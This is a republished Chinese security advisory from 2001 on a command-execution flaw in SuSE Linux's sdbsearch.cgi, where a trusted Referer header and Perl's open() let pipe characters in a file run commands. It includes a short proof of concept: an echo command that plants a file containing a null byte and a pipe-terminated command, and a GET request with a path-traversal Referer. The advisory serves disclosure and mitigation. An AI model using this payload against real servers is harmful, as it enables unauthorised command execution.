SuSE linux sdbsearch.cgi执行任意代码漏洞

2008-04-09 04:27:56来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

SuSE linux sdbsearch.cgi执行任意代码漏洞

发布日期:2001-08-02
更新日期:2001-08-03

受影响系统:

SuSE Linux 6.x
SuSE Linux 7.1
SuSE Linux 7.2
描述:

SuSE Linux发行版中带了一个名为'sdbsearch.cgi'的perl脚本。

它存在一个安全问题,可能导致攻击者执行任意命令。

这个脚本信任客户端发送的HTTP请求中的HTTP_REFERER变量的内容。'sdbsearch.cgi'
利用它来作为关键字来定位文件。如果攻击者可以设法上传一个包含特定内容的文件,
'sdbsearch.cgi'将会使用open()调用来打开匹配的文件。如果文件中包含管道符等shell
元字符,攻击者就可能以httpd运行身份执行任意命令。

<*来源:Maurycy Prodeus (z33d@eth-security.net) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Maurycy Prodeus (z33d@eth-security.net)提供了如下测试方法:

首先攻击者要设法上传一个"keylist.txt"的文件。
如果在本机测试可以执行如下操作:
$ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt

向目标主机发送如下HTTP请求:

GET /cgi-bin/sdbsearch.cgi?stichwort=keyword HTTP/1.0
Referer: http://szachy.org/../../../../../tmp

这将会在/tmp/下创建'exploitable'文件。



建议:

临时解决方法:

暂时禁止此CGI脚本的执行权限。或者将其移出/cgi-bin/目录。

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.suse.com/


标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Windows 标准输出系统崩溃漏洞

下一篇:vmware tmp目录许可证信息漏洞